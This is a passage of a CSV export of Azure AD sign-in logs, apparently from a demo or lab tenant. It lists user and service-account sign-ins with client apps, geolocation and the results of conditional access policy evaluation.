'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",88cadf22-86a5-4f87-805f-6b2896271300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b2896271300,SigninLogs,Sucess,38.73078156,-78.17196655
+183,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc7af5d1-a23e-4733-803d-8c6f06c67937,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",53b0f25d-c935-4697-96da-861644d31200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,53b0f25d-c935-4697-96da-861644d31200,SigninLogs,Sucess,33.7984581,-84.38828278
+184,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a48cef3d-3f31-4609-a671-f60b3b008f6b,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",e82050b8-a2c4-426d-8c05-8f1df48e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e82050b8-a2c4-426d-8c05-8f1df48e0e00,SigninLogs,Sucess,38.47222137,-77.41989899
+185,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:04.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8ae2eb3-726f-445f-a77d-78550b53c353,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4aed1172-3ed3-4e97-ac91-0186d39c0300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aed1172-3ed3-4e97-ac91-0186d39c0300,SigninLogs,Sucess,36.6404686,-78.26995087
+186,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b4a3a477-e5de-4fbc-94dd-50005c67575a,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",23877b62-2023-4ce4-9fb4-bf6580e61500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,23877b62-2023-4ce4-9fb4-bf6580e61500,SigninLogs,Sucess,35.01296997,-80.93171692
+187,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,28b31186-2f82-4077-9f86-cdd1ca59e905,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:34,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",2dd0c993-4199-4428-90ff-ee601a865a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,2dd0c993-4199-4428-90ff-ee601a865a00,SigninLogs,Sucess,32.32146072,34.85319901
+188,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:42.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,72a3a272-88e3-4b12-ae9e-4250f6188bbf,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",f8ab7c64-069d-4e7b-982c-039d3b915b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f8ab7c64-069d-4e7b-982c-039d3b915b00,SigninLogs,Sucess,32.32146072,34.85319901
+189,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:16.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,af6d99df-e5d0-4d03-aca9-ce4e4280be9a,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",cab11a23-741d-4ba5-9c87-1055c4f02500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cab11a23-741d-4ba5-9c87-1055c4f02500,SigninLogs,Sucess,47.68061829,-122.1869888
+190,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:34.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6ec7469f-f03e-0000-4704-aff082a6e6c6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 